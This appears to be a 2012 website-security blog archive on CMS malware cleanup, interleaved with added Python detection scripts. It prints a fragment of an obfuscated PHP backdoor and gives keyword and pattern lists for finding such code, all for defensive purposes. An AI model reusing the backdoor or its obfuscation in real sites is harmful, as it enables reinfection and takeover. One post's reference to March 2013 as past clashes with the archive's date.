Archives for December 2012

W3 Total Cache Implementation Vulnerability

Just in time for Christmas, a security (configuration/implementation) bug in W3 Total Cache (W3TC), one of the most popular WordPress plugins, was announced on the Full Disclosure list.

The issue is connected to the way W3TC stores the database cache (in a publicly accessible directory). It can be used to retrieve password hashes and other database information.

By default the plugin will store the caches inside /wp-content/w3tc/dbcache/ and if you have directory listing enabled, anyone can browse to and download them. The second issue is that even if you don’t have directory listing enabled, it is still possible to guess those directories/files in order to extract the database cache queries and results.

Read More

Website Malware – Drupal Injections Targeting Cookies

Many folks are unfamiliar with the Drupal CMS. It doesn't enjoy the popularity that WordPress and Joomla do, but it's a powerful CMS nonetheless. What it does have in common with its counterparts is that it's susceptible to attacks and infections. We don't often write about it, but we do work on the platform. We decided to give it some attention this week because of the increased number of Drupal infections we're seeing.

They're slightly different when compared to other CMS applications, and so is the remediation process. In this post we'll show an infection that seems to be all the craze this week, findings courtesy of Fioravante Souza, one of our Sr. Malware Engineers.

The Payload

Most of the sites infected with this payload are also accompanied by other iframe injections. Those iframe injections are not special: they are often attached to every file (PHP, JS, HTML), begin with document.write, and reference some file like cgi?5 or cfg?11. If you have some terminal sense you should be able to find and remove them; if you need help you can always use our free scanner, which will display any payloads hitting the reader's browser. Here is the payload, though, that we were most interested in, as it was obfuscated and very painful to find and remove.
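The iframe injections just described are simple enough to find mechanically. The scanner below is an added example (not code from the original post or from Sucuri) that flags any document.write whose statement emits an iframe, literally, URL-encoded or JS-hex-escaped, or references a cgi?N / cfg?N style resource; the sample file contents and the example.invalid host are constructed for the demonstration.

```python
import re

# Constructed sample files (not taken from the original post): two clean files
# and two carrying the document.write iframe injection described above, which
# references resources such as "cgi?5" or "cfg?11".
SAMPLE_FILES = {
    "index.php": "<?php print theme('page'); ?>\n",
    "footer.tpl.php": (
        "<div>footer</div>\n"
        "<script>document.write('<iframe src=\"http://example.invalid/cgi?5\" "
        "width=1 height=1></iframe>');</script>\n"
    ),
    "misc/drupal.js": (
        "Drupal.behaviors = {};\n"
        "document.write(unescape('%3Ciframe src=http://example.invalid/cfg?11%3E'));\n"
    ),
    "sites/default/settings.php": "<?php $databases = array();\n",
}

# An iframe tag written literally, URL-encoded (%3C) or JS-hex-escaped (\x3c).
IFRAME_RE = re.compile(r"(?:<|%3c|\\x3c)\s*iframe", re.IGNORECASE)
# The short "cgi?N" / "cfg?N" resource names this campaign used.
RESOURCE_RE = re.compile(r"\b(?:cgi|cfg)\?\d+\b")


def find_injections(text):
    """Return (line_number, excerpt) for every document.write that emits an
    iframe or references a cgi?N / cfg?N resource on the same line."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for m in re.finditer(r"document\.write\s*\(", line, re.IGNORECASE):
            stmt = line[m.start():]
            if IFRAME_RE.search(stmt) or RESOURCE_RE.search(stmt):
                hits.append((lineno, stmt[:72]))
    return hits


def scan_files(files):
    """Map each infected file name to its hits; clean files are omitted."""
    report = {}
    for name, body in files.items():
        hits = find_injections(body)
        if hits:
            report[name] = hits
    return report


if __name__ == "__main__":
    for name, hits in scan_files(SAMPLE_FILES).items():
        for lineno, excerpt in hits:
            print(f"{name}:{lineno}: {excerpt}")
```

Run over a real site by reading each file from disk into the same dictionary shape; a hit is only a lead, so confirm it before deleting anything.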

Read More

Website Malware – Sharp Increase in SPAM Attacks – WordPress & Joomla

This past week we have seen a sharp increase in the use of old tactics designed to poison your search engine results – also known as Search Engine Poisoning (SEP) attacks. If you use our free scanner, SiteCheck, you’ll likely see something like the following:

Sucuri - ViewState Infection

You’re probably wondering, what the heck, how is that SEO SPAM? Allow me to explain what this is doing.

Read More

Website Malware – Reality of Cross-Site Contaminations

Sometimes you can't help but put yourself in the shoes of your clients and skeptics and wonder how many times they roll their eyes at the things you say. Cross-site contamination is one of those things.

We first started writing about it in March of 2013 in a little post that got a lot of attention, "A Little Tale About Website Cross Contamination". In that case we talked about how the attack vector was a neighboring site that had since been neglected and was now housing the payload generator that was affecting the live sites. All in all, it was a sad and depressing story.

This case is unique in that it would fall into what we would categorize as a targeted attack. That's right, the complete opposite of what we often tell most readers they fall into, opportunistic attacks. I will caveat that it's not known for sure, but after reading this we'll let you be the judge.

/* It’s nothing personal, it’s just business */

Read More

WordPress 3.5 Released

Update like it’s hot!

Today marks the release of WordPress 3.5 (named Elvin after jazz drummer Elvin Jones), a major release this year for the WordPress project.

WordPress 3.5

This release highlights some very significant changes to everything from the JavaScript libraries being used to a brand new Media Manager. Although there are no security fixes highlighted, various bugs were fixed along with the newly added features.

Read More

Web Malware – Working with Evil Backdoors – Part III

The most complicated part of our job, when cleaning compromised web sites, is ensuring we find all backdoors. If we miss one, the site can be reinfected. We have done a few posts about backdoors already, explaining how they work and providing examples of what they are and what they look like:

However, despite it being a very complicated task, most people still think that removing backdoors consists of searching for eval calls, base64_decode and similar keywords. While that will find some, it's not highly effective.

Ugly Backdoor

Today we will present BACKDOOR:UGLY:13 (yes, that's how we name it). It is code we are finding on WordPress/Joomla sites compromised with SEO spam, used to allow the attackers to reinfect the site and reinject spam code:

' ,|:F-2>1u@:"'.qgQ1.'<*'^EMR.'"@'.tKU2.'$Ln&)(hkx';$Arb='>8a'^Mb9;'Tpr'.
'.=8l`5'&'RVN]m.l}z^H>';$QgYL=' ".'.DAMT.'%#Q'|' $+(<TH@T-#A';$GDWkPb='@*'.
'$p4"W-,'|'0!&c`v!,0>4$OP0 f#p')^$GDWkPbCn5;$DP7=('5$ C1="E+c.'.g27mr.#DfTy'.
'%!'.r0x66.'<22@5x'|'!4(2rc>`3a?!73 '.cH9a.'$`<34("y+P')&('{jWR%O.%1m^R%-<B'.
'{/7p"'.fjlb.' =i,'^';os0}>?,Qd{(l')|$_bGCvD;if($g1MRqXRy($Db_3w(/*BZKHhHPA'.
'n*/$niZ),$eBwDr2V.$ArvQhb.('lv^9{p'^'"C<T6M'));#medAQT)W(Azd-,JG ?f.Er?2R'.
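The sample above contains no eval or base64_decode at all; it assembles its code by applying PHP's byte-wise ^, | and & operators to string literals. The checker below is an added example (not code from the original post or from Sucuri) that puts the keyword approach beside a heuristic for exactly that construction: it counts string literals that are bitwise-combined with another literal or a bare word. The three PHP fragments are constructed for the demonstration and are not the actual BACKDOOR:UGLY:13 sample; the threshold of 3 is an assumption.

```python
import re

# Constructed PHP fragments (not the actual BACKDOOR:UGLY:13 sample from the post).
# CLASSIC is the kind of backdoor a keyword search finds; OBFUSCATED is written in
# the same style as the sample above: string literals combined with ^, | and &.
CLASSIC = "<?php eval(base64_decode('cGhwaW5mbygpOw==')); ?>"
OBFUSCATED = r"""<?php $a='>8a'^Mb9;$b=('lv^9{p'^'"C<T6M')|$c;
$d=('%!'.r0x66.'<22@5x'|'!4(2rc>3a?!73 ');if($f($g('k'^'2')))$h();"""
CLEAN = "<?php $x = 'hello' . 'world'; if ($a & $b) { echo 'ok'; }"

# The naive approach: count the usual suspect function names.
KEYWORD_RE = re.compile(r"\b(?:eval|base64_decode|gzinflate|str_rot13|assert)\s*\(")

# A single-quoted PHP string literal (backslash escapes allowed inside).
STR = r"'(?:[^'\\]|\\.)*'"
# A string literal bitwise-combined (^ | &) with another literal or a bare word.
# PHP applies these operators byte-wise to strings, which is how the sample
# builds function names and code without ever spelling them out.
BITWISE_STR_RE = re.compile(STR + r"\s*[\^|&]\s*(?:" + STR + r"|[A-Za-z_]\w*)")


def keyword_hits(src):
    return len(KEYWORD_RE.findall(src))


def bitwise_string_ops(src):
    return len(BITWISE_STR_RE.findall(src))


def is_suspicious(src, threshold=3):
    """Flag a file if either heuristic fires; the threshold (assumed) keeps a
    rare legitimate string XOR, e.g. a one-off checksum, from tripping the scan."""
    return keyword_hits(src) > 0 or bitwise_string_ops(src) >= threshold


if __name__ == "__main__":
    for label, src in (("classic", CLASSIC), ("obfuscated", OBFUSCATED), ("clean", CLEAN)):
        print(label, keyword_hits(src), bitwise_string_ops(src), is_suspicious(src))
```

The keyword count is 0 for the obfuscated fragment while the bitwise-string count is 4, which is the gap the post is pointing at; double-quoted strings and other operator tricks would need their own patterns.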

Read More

Sucuri SiteCheck Malware Scanner Plugin for WordPress

If you’re a WordPress user, love our free SiteCheck scanner, or already use our free SiteCheck Malware Scanner Plugin for WordPress, we have an update for you.

Sucuri Security - SiteCheck Malware Scanner

Read More

Sucuri Launches Rapid+ Monitoring

A common feature our clients have been asking us for a long time is the ability to monitor their sites more frequently. For some high profile sites, scans every 6 hours are not enough.

Today we are happy to announce that we added the Sucuri Rapid+ Monitoring option to allow our customers to increase their monitoring frequency to a scan every 30 minutes.

Read More

PSA: December Zero Day’s Announced – MySQL, FreeSSH, Free FTPD

So it looks like we're closing out 2012 in style. This weekend a number of new, very serious, zero-day vulnerabilities were released for a number of very popular applications: MySQL, FreeSSH, Free FTPD.

Of the three, the most concerning is obviously MySQL. If you listen to any of our security presentations you know that your application is but one piece of the puzzle, and your environment is a critical component of that puzzle too.

MySQL is integral to any LAMP based application (LAMP = Linux, Apache, MySQL, PHP), which includes many open source content management systems (CMS) like WordPress, Joomla, Drupal, Magento, osCommerce and many more. This is exceptionally dangerous to those environments in which MySQL is exposed to the world (i.e., not bound to localhost, or with its port open), and it applies to VPS and shared environments alike.

JavaScript Redirect Using Multiple Outdated Websites

This is a doozy. This case was really interesting to remediate as it consisted of multiple outdated websites in a shared environment.

We're talking known vulnerable instances of WordPress and TimThumb here. There were more than 8 websites on the server (all running WordPress below 3.2), and the backdoors and malicious payloads were distributed across 3 websites.

I am going to break it down for you, and also show how challenging it can be to clear all the malware affecting a website in a shared environment.

1. The Initial Request

One of our customers submitted a cleanup request for one of his/her websites. The description of the problem:

When you log into my website, it re-directs you to somewhere else.

Awesome, I got this!

I naturally dropped the URL in a browser to check it out, here’s what I got:

Malicious redirect

I had just replicated what our customer had noted. If you tried bringing up website #1 in a browser it would redirect to somewhere else. Good thing for him that it wasn’t redirecting somewhere worse like a porn site, or a Viagra ad :/

Start the Cleanup

Time to get into the server, files, and other fun stuff.

After checking out the site and seeing its unwanted behavior, I did a free remote scan with Sucuri SiteCheck. SiteCheck isn't perfect, but it's a damn useful tool, and nine times out of ten it gives me valuable information about the website, the malware attacking the site, and even useful server level data.

SiteCheck was spotting some odd business going on and gave me a good general idea of what may be going on:

I logged in via sFTP to the site and started running some tests. The first thing I did was run a version check across the known software on the server; here's what I got:

Warning: Found outdated timthumb.php version at ..//website1/wp-content/themes/theme/timthumb.php (bellow 2.0).

Warning: Found outdated WordPress install inside: ..//website1 - Version: $wp_version = '3.2.1';

Warning: Found outdated WordPress install inside: ..//website2 - Version: $wp_version = '3.2.1';

Warning: Found outdated timthumb.php version at ..//website2/wp-content/themes/theme/timthumb.php (bellow 2.0).

Warning: Found outdated WordPress install inside: ..//backup - Version: $wp_version = '3.0.1';

Warning: Found outdated timthumb.php version at ..//backup/wp-content/themes/theme/timthumb.php (bellow 2.8.2).
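A version check like the one whose output appears above is easy to reproduce for a shared-hosting account, including the forgotten backup copies that the scan turned up. The script below is an added example (not the tool used in the post or any Sucuri code): it walks a directory tree, reads $wp_version from every wp-includes/version.php and the VERSION define from every timthumb.php, and reports anything below assumed version floors. The define ('VERSION', ...) format for timthumb.php, the floors of WordPress 3.5 and timthumb 2.8.14, and the directory layout it builds in a temporary directory are all assumptions made for the demonstration.

```python
import os
import re
import tempfile

MIN_WP = (3, 5)  # assumed floors for this example; anything older is reported
MIN_TIMTHUMB = (2, 8, 14)
WP_RE = re.compile(r"\$wp_version\s*=\s*'([\d.]+)'")
# timthumb.php declares itself as define ('VERSION', 'x.y.z'); (assumed format)
TT_RE = re.compile(r"define\s*\(\s*'VERSION'\s*,\s*'([\d.]+)'\s*\)")

def vtuple(s):
    return tuple(int(p) for p in s.split("."))

def version_check(root):
    """Walk root; report each WordPress core or timthumb.php below the floors,
    worded like the scan output above."""
    warnings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="ignore") as fh:
                src = fh.read()
            if name == "version.php" and os.path.basename(dirpath) == "wp-includes":
                m = WP_RE.search(src)
                if m and vtuple(m.group(1)) < MIN_WP:
                    warnings.append("Warning: Found outdated WordPress install inside: "
                                    f"{os.path.dirname(dirpath)} - Version: $wp_version = '{m.group(1)}';")
            elif name.lower() == "timthumb.php":
                m = TT_RE.search(src)
                if m and vtuple(m.group(1)) < MIN_TIMTHUMB:
                    floor = ".".join(map(str, MIN_TIMTHUMB))
                    warnings.append(f"Warning: Found outdated timthumb.php version at {path} (below {floor}).")
    return sorted(warnings)

def build_fixture():
    """Constructed shared-hosting layout: two live sites plus a stale backup copy."""
    root = tempfile.mkdtemp()
    layout = {
        "website1/wp-includes/version.php": "<?php\n$wp_version = '3.2.1';\n",
        "website1/wp-content/themes/theme/timthumb.php": "<?php\ndefine ('VERSION', '1.34');\n",
        "website2/wp-includes/version.php": "<?php\n$wp_version = '3.5';\n",
        "backup/wp-content/themes/theme/timthumb.php": "<?php\ndefine ('VERSION', '2.8.2');\n",
    }
    for rel, body in layout.items():
        os.makedirs(os.path.dirname(os.path.join(root, rel)), exist_ok=True)
        with open(os.path.join(root, rel), "w", encoding="utf-8") as fh:
            fh.write(body)
    return root

if __name__ == "__main__":
    for w in version_check(build_fixture()):
        print(w)
```

Point version_check at the account's document root instead of the fixture; the stale backup directory is reported just like a live site, which is the whole point of walking the tree rather than only the sites you know about.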

Website #3

Location of JavaScript Redirect code – /public_html/website3/wp-content/backups/20100425-1849/root/wp-includes/js/tinymce/plugins/inlinepopups/skins

Website URL for redirect –